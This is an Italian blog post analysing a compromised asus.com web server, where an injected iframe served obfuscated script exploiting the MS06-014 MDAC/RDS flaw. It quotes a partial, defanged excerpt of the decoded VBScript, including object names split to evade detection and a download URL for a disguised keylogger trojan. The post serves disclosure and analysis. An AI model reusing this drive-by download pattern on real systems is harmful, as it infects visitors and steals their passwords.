Compromesso un webserver di asus.com

Ieri, tramite il suo blog, Kaspersky ha segnalato la compromissione del sito asus.com. Stando a quanto detto da loro, il codice all’interno della pagina richiamata tramite un iframe inserito nella home page di asus.com sfrutterebbe il recente bug sui file ANI di Microsoft Windows.
L’ISC ha fatto notare che Asus utilizza un round robin DNS per i Webserver. Quello che nessuno ha detto è che l’unico server ad essere stato compromesso è stato 211.72.249.198, l’unico che raggiunto con www.asus.com presenta la pagina internazionale di Asus.

Asus international

Tutti gli altri server presentano la home page standard di Asus USA.
Come già detto, i cracker hanno utilizzato un iframe per includere codice JavaScript e VBScript malevolo, ma contrariamente a quanto detto da Kaspersky, esso non sfrutta il bug sui file ANI ma una vulnerabilità in Microsoft Data Access Components corretta con la patch MS06-014.
Ecco come si presenta la parte compromessa della pagina di www.asus.com (click per ingrandire):
Compromised source of www.asus.com

La pagina iniettata, ospitata su un Webserver cinese (indirizzo ip 222.73.247.123), contiene del codice JavaScript offuscato, il quale una volta decodificato crea un VBScript appositamente scritto per sfruttare la vulnerabilità su RDS, ne riporto la parte più significativa (ho volutamente modificato http nell’url):
clID1 = "clsi"
clID2 = "d:BD96C556-65A3-11D0-983A-00C04FC29E36"
XML1 = "Mic"
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "hxxp://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")

L’immagine PNG richiamata è in realtà un Trojan eseguibile su piattaforme Windows (offuscato) (32bit x86) della famiglia PSW i quali fungono da keylogger e “steal password”.

La cosa grave, a mio avviso, è che a due giorni dalla segnalazione Asus non ha ancora fatto niente per evitare l’infezione dei propri visitatori.

 

2 Commenti a 'Compromesso un webserver di asus.com'

Segui i commenti sottoscrivendo il feed RSS oppure TrackBack a 'Compromesso un webserver di asus.com'.

  1. Ottimo, ho un paio di colleghi che stavano cercando un portatile e hanno sicuramente visitato qualla pagina….
    Perfetto, altr pc da formattare! :-D
    Niente da dire, bello windows……

  2. luc

    se sfrutta una falla del 2006 MS06-014. non vedo di che preoccuparsi visto che è già stata patchata da 1 anno

:: Trackbacks/Pingbacks ::

Nessun Trackbacks/Pingbacks

Lascia un Commento